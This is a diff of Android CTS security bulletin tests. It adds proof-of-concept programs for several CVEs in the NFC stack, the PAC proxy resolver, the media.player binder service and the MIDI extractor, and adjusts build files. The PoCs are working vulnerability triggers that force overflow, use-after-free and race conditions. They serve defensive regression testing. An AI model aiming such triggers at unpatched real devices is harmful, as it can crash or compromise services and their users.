-int freeAllocatedMemoryAndReturn(SPATIAL_BS_FRAME *frame, spatialDec *decoder,
- int errorCode) {
- if (frame) {
- if (frame->CLDLosslessData) {
- for (int i = 0; i < MAX_NUM_OTT; ++i) {
- if ((&frame->CLDLosslessData[i])->state) {
- free((&frame->CLDLosslessData[i])->state);
- (&frame->CLDLosslessData[i])->state = nullptr;
- }
- }
- free(frame->CLDLosslessData);
- frame->CLDLosslessData = nullptr;
- }
- if (frame->ICCLosslessData) {
- free(frame->ICCLosslessData);
- frame->ICCLosslessData = nullptr;
- }
- if (frame->IPDLosslessData) {
- free(frame->IPDLosslessData);
- frame->IPDLosslessData = nullptr;
- }
- free(frame);
- frame = nullptr;
- }
-
- if (decoder) {
- if (decoder->pConfigCurrent) {
- free(decoder->pConfigCurrent);
- decoder->pConfigCurrent = nullptr;
- }
- if (decoder->ottCLDidxPrev) {
- free(decoder->ottCLDidxPrev);
- decoder->ottCLDidxPrev = nullptr;
- }
- if (decoder->smgTime) {
- free(decoder->smgTime);
- decoder->smgTime = nullptr;
- }
- if (decoder->smgData) {
- free(decoder->smgData);
- decoder->smgData = nullptr;
- }
- if (decoder->smoothState) {
- free(decoder->smoothState);
- decoder->smoothState = nullptr;
- }
- free(decoder);
- decoder = nullptr;
- }
- return errorCode;
-}
-
int main() {
- spatialDec *decoder = (spatialDec *)malloc(sizeof(spatialDec));
- if (!decoder) {
- return EXIT_FAILURE;
- }
- SPATIAL_BS_FRAME *frame =
- (SPATIAL_BS_FRAME *)malloc(sizeof(SPATIAL_BS_FRAME));
+ spatialDec decoder;
+ memset(&decoder, 0x0, sizeof(spatialDec));
- RETURN_EXIT_FAILURE_IF_NULL(frame);
- memset(frame, 0x00, sizeof(SPATIAL_BS_FRAME));
+ decoder.numOttBoxes = MAX_NUM_OTT;
- RETURN_EXIT_FAILURE_IF_NULL(decoder);
- memset(decoder, 0x00, sizeof(spatialDec));
+ SPATIAL_SPECIFIC_CONFIG pConfigCurrent;
+ memset(&pConfigCurrent, 0x0, sizeof(SPATIAL_SPECIFIC_CONFIG));
+ decoder.pConfigCurrent = &pConfigCurrent;
- size_t allocSize = sizeof(LOSSLESSDATA) * MAX_NUM_OTT * MAX_NUM_PARAMETERS;
+ SCHAR ottCLDidxPrev[ARR_SIZE] = {};
+ decoder.ottCLDidxPrev = (SCHAR **)&ottCLDidxPrev;
- frame->CLDLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->CLDLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ int smgTime = 1;
+ decoder.smgTime = &smgTime;
- frame->ICCLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->ICCLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ UCHAR smgData[ARR_SIZE] = {};
+ decoder.smgData = (UCHAR **)&smgData;
- frame->IPDLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->IPDLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ SMOOTHING_STATE smoothState;
+ memset(&smoothState, 0x0, sizeof(SMOOTHING_STATE));
+ decoder.smoothState = &smoothState;
- frame->numParameterSets = MAX_PARAMETER_SETS;
+ decoder.arbitraryDownmix = 0;
+ (decoder.concealInfo).concealState = SpatialDecConcealState_Ok;
+
+ const size_t allocSize = MAX_NUM_OTT * MAX_NUM_PARAMETERS;
+
+ SPATIAL_BS_FRAME frame;
+ memset(&frame, 0x0, sizeof(SPATIAL_BS_FRAME));
+
+ frame.numParameterSets = MAX_PARAMETER_SETS;
+
+ LOSSLESSDATA CLDLosslessData[allocSize] = {};
+ frame.CLDLosslessData = CLDLosslessData;
+
+ LOSSLESSDATA ICCLosslessData[allocSize] = {};
+ frame.ICCLosslessData = ICCLosslessData;
+
+ LOSSLESSDATA IPDLosslessData[allocSize] = {};
+ frame.IPDLosslessData = IPDLosslessData;
for (int i = 0; i < MAX_NUM_OTT; ++i) {
- (&frame->CLDLosslessData[i])->state = nullptr;
for (int j = 0; j < MAX_PARAMETER_SETS; ++j) {
- (&frame->CLDLosslessData[i])->bsXXXDataMode[j] = 2;
+ (frame.CLDLosslessData[i]).bsXXXDataMode[j] = 2;
}
- (&frame->CLDLosslessData[i])->state =
- (LOSSLESSSTATE *)malloc(sizeof(LOSSLESSSTATE));
- RETURN_EXIT_FAILURE_IF_NULL((&frame->CLDLosslessData[i])->state);
- memset((&frame->CLDLosslessData[i])->state, 0x00, sizeof(LOSSLESSSTATE));
+ LOSSLESSSTATE lossLessState;
+ (frame.CLDLosslessData[i]).state = &lossLessState;
}
- decoder->numOttBoxes = MAX_NUM_OTT;
-
- decoder->pConfigCurrent =
- (SPATIAL_SPECIFIC_CONFIG *)malloc(sizeof(SPATIAL_SPECIFIC_CONFIG));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->pConfigCurrent);
- memset(decoder->pConfigCurrent, 0x00, sizeof(SPATIAL_SPECIFIC_CONFIG));
-
- decoder->ottCLDidxPrev = (SCHAR **)malloc(sizeof(SCHAR *));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->ottCLDidxPrev);
- memset(decoder->ottCLDidxPrev, 0x00, sizeof(SCHAR *));
-
- decoder->smgTime = (int *)malloc(sizeof(int));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smgTime);
- memset(decoder->smgTime, 0x00, sizeof(int));
-
- decoder->smgData = (UCHAR **)malloc(sizeof(UCHAR *));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smgData);
- memset(decoder->smgData, 0x00, sizeof(UCHAR *));
-
- decoder->smoothState = (SMOOTHING_STATE *)malloc(sizeof(SMOOTHING_STATE));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smoothState);
- memset(decoder->smoothState, 0x00, sizeof(SMOOTHING_STATE));
-
- decoder->arbitraryDownmix = 0;
- (decoder->concealInfo).concealState = SpatialDecConcealState_Ok;
-
- SpatialDecDecodeFrame(decoder, frame);
- return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_SUCCESS);
+ SpatialDecDecodeFrame(&decoder, &frame);
+ return EXIT_SUCCESS;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp
new file mode 100644
index 0000000..dbb07bc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0006",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp
new file mode 100644
index 0000000..e90150e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+// borrowed from rw_i93.cc
+#define RW_I93_FORMAT_DATA_LEN 8
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t* p_uid);
+void* vulnerable_ptr;
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void* GKI_getbuf(uint16_t size) {
+ void* ptr = malloc(size);
+ if (size == RW_I93_FORMAT_DATA_LEN) {
+ vulnerable_ptr = ptr;
+ }
+ return ptr;
+}
+
+void GKI_freebuf(void* p_buf) {
+ if (p_buf == vulnerable_ptr) {
+ free(p_buf);
+ }
+}
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_FORMAT;
+ p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
+ p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
+ p_data->status = NFC_STATUS_OK;
+ TIMER_LIST_ENT pFirst = {};
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp
new file mode 100644
index 0000000..cbe6a4e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2020-0073",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/include",
+ "system/nfc/src/gki/ulinux",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
new file mode 100644
index 0000000..d6ea446
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include <nfc_api.h>
+#include <rw_int.h>
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void rw_t2t_handle_rsp(uint8_t* p_data);
+void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) {
+ (void)event;
+ (void)p_rw_data;
+}
+
+int main() {
+ tRW_T2T_CB* p_t2t = &rw_cb.tcb.t2t;
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+ p_t2t->state = RW_T2T_STATE_DETECT_TLV;
+ p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
+ p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
+ p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
+ p_t2t->bytes_count = 1;
+ p_t2t->num_lockbytes = RW_T2T_MAX_LOCK_BYTES;
+ uint8_t data[T2T_READ_DATA_LEN];
+ rw_t2t_handle_rsp(data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp
new file mode 100644
index 0000000..084a1fe
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0224",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ shared_libs: [
+ "libpac",
+ ],
+ srcs: [
+ "poc.cpp",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp
new file mode 100644
index 0000000..de62221
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp
@@ -0,0 +1,60 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <codecvt>
+#include <fstream>
+#include "../includes/common.h"
+#include <proxy_resolver_v8_wrapper.h>
+
+using namespace std;
+
+void poc(char* raw) {
+ ProxyResolverV8Handle* handle = ProxyResolverV8Handle_new();
+ string u8Script(raw);
+ u16string u16Script =
+ wstring_convert<codecvt_utf8_utf16<char16_t>, char16_t> { }
+ .from_bytes(u8Script);
+
+ ProxyResolverV8Handle_SetPacScript(handle, u16Script.data());
+ const char16_t* spec = u"", *host = u"";
+ ProxyResolverV8Handle_GetProxyForURL(handle, spec, host);
+ ProxyResolverV8Handle_delete(handle);
+}
+
+int main(int argc, char **argv) {
+ if (argc != 2) {
+ return EXIT_FAILURE;
+ }
+
+ ifstream stream;
+ stream.open(argv[1]);
+ if (stream.rdstate() != ifstream::goodbit) {
+ return EXIT_FAILURE;
+ }
+
+ stream.seekg(0, ios::end);
+ size_t size = stream.tellg();
+ stream.seekg(0);
+ char* raw = (char*) calloc(size + 1, sizeof(char));
+ stream.read(raw, size);
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ poc(raw);
+ }
+
+ free(raw);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp
new file mode 100644
index 0000000..f45207f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0243",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libutils",
+ "libbinder",
+ "libutilscallstack",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp
new file mode 100644
index 0000000..5841427
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp
@@ -0,0 +1,97 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+#include "../includes/common.h"
+
+using namespace android;
+
+typedef struct ThreadParams {
+ sp<IBinder> service;
+} ThreadParams;
+
+static void *thread_getParameter(void *p) {
+ ThreadParams *params = (ThreadParams *)p;
+ int err;
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ Parcel data, reply;
+ data.writeInterfaceToken(params->service->getInterfaceDescriptor());
+ int key = (('m') << 24 | ('t') << 16 | ('r') << 8 | ('X'));
+ data.writeInt32(key);
+ err = params->service->transact(/*GET_PARAMETER_ID*/ 31, data, &reply, 0);
+ if (err == EPIPE) {
+ break;
+ }
+ usleep(5000);
+ }
+ return nullptr;
+}
+
+int main() {
+ status_t err;
+ sp<IServiceManager> sm = defaultServiceManager();
+ String16 name(String16("media.player"));
+ sp<IBinder> service = sm->checkService(name);
+ sp<IBinder> binder = nullptr;
+ if (not service) {
+ return EXIT_FAILURE;
+ }
+
+ String16 interface_name = service->getInterfaceDescriptor();
+ Parcel data, reply;
+ data.writeInterfaceToken(interface_name);
+ data.writeStrongBinder(new BBinder());
+ for (int i = 0; i < 1024; ++i)
+ data.writeInt32(1);
+ if (service) {
+ err = service->transact(/*CREATE_ID*/ 1, data, &reply, 0);
+ binder = reply.readStrongBinder();
+ }
+
+ if (not binder) {
+ return EXIT_FAILURE;
+ }
+
+ pthread_t t1, t2;
+
+ ThreadParams *params = new ThreadParams();
+ params->service = binder;
+ pthread_create(&t1, nullptr, thread_getParameter, params);
+ pthread_create(&t2, nullptr, thread_getParameter, params);
+
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ if (not binder) {
+ break;
+ }
+ Parcel data, reply;
+ data.writeInterfaceToken(binder->getInterfaceDescriptor());
+ data.writeStrongBinder(binder);
+ err = binder->transact(/*SET_DATA_SOURCE_URL_ID*/ 2, data, &reply, 0);
+ if (err == EPIPE) {
+ break;
+ }
+ usleep(500000);
+ }
+
+ pthread_join(t1, nullptr);
+ pthread_join(t2, nullptr);
+ delete params;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp
new file mode 100644
index 0000000..1965f50
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0383",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp
new file mode 100644
index 0000000..313f21a7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
index 70c3eed..c32cb4a 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
@@ -27,9 +27,6 @@
"-DENABLE_SELECTIVE_OVERLOADING",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"system/nfc/src/nfc/include/",
@@ -41,7 +38,6 @@
shared_libs: [
"libnfc-nci",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
index 1876c60..1c231b7 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
@@ -22,14 +22,10 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
shared_libs: [
"libmediandk",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp
new file mode 100644
index 0000000..5cad1e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
